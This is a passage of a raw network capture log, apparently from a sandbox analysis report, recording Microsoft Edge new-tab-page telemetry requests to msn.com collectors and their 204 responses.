                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 10419
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:55 UTC10419OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 34 3a 35 34 2e 33 34 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:54:54.344Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":12,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loc
                                                                                                                                                                  2025-01-11 06:54:55 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=207f9db0746f454a98b7a97f85f0c024&HASH=207f&LV=202501&V=4&LU=1736578495483; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:54:55 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=acf0adf6eb3845828e01aacfe929af00; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:24:55 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1123
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:55 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  69192.168.11.205282313.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:58 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578497331&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 10410
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:58 UTC10410OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 34 3a 35 37 2e 33 33 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:54:57.331Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":13,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loc
                                                                                                                                                                  2025-01-11 06:54:58 UTC889INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=8c98b0eab23d4d0f9b3b26a9be9d3454&HASH=8c98&LV=202501&V=4&LU=1736578498294; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:54:58 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=993c7d265c37431d84dcc3f15ff02fe7; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:24:58 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 963
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:57 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  70192.168.11.205582913.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:55:01 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578500350&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 10391
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:55:01 UTC10391OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 35 3a 30 30 2e 33 34 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:55:00.349Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":14,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loc
                                                                                                                                                                  2025-01-11 06:55:01 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=c0c254c7e35a4ba9b59413428efdf337&HASH=c0c2&LV=202501&V=4&LU=1736578501369; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:55:01 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=4cbad2e995834e4d8282c237d6e14734; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:25:01 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1019
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:55:00 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  71192.168.11.205255913.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:55:04 UTC1049OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578503345&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 9369
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:55:04 UTC9369OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 35 3a 30 33 2e 33 34 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:55:03.344Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":15,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loc
                                                                                                                                                                  2025-01-11 06:55:04 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=b53b11aefde742f691044a2640e1f00b&HASH=b53b&LV=202501&V=4&LU=1736578504351; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:55:04 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=c6266c38488e418eae2253c5c4737efe; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:25:04 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1006
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:55:03 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  72192.168.11.2062750204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:55:04 UTC1025OUTGET /notify/viewed?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=11&p=edgechrntp&l=en-us&d=bing&b=Edg&a=1dd19eb1-735b-470f-9209-d9bb436269a4&ii=1&c=7645241228381444372&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-11&ptid=edgechrntp-peekInfopane-2&t=type.msft-content-card&dec=1-1 HTTP/1.1
                                                                                                                                                                  Host: srtb.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:55:04 UTC581INHTTP/1.1 204 No Content
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Expires: -1
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  X-MSEdge-Ref: Ref A: 6283A62186C7469EAEA1D0A55EFC7A2E Ref B: CHI30EDGE0221 Ref C: 2025-01-11T06:55:04Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:55:04 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  73192.168.11.205834213.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:55:07 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578506345&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 10170
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:55:07 UTC10170OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 35 3a 30 36 2e 33 34 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 36 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:55:06.344Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":16,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loc
                                                                                                                                                                  2025-01-11 06:55:07 UTC889INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=4baaf45d25be451d85fba3e7f4171dd9&HASH=4baa&LV=202501&V=4&LU=1736578507317; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:55:07 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=0a7e2b5700d44bcbabe4212f65ba448a; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:25:07 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 972
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:55:07 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  74192.168.11.205020613.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:55:07 UTC1049OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578506866&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 8659
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:55:07 UTC8659OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 35 3a 30 36 2e 38 36 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 37 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
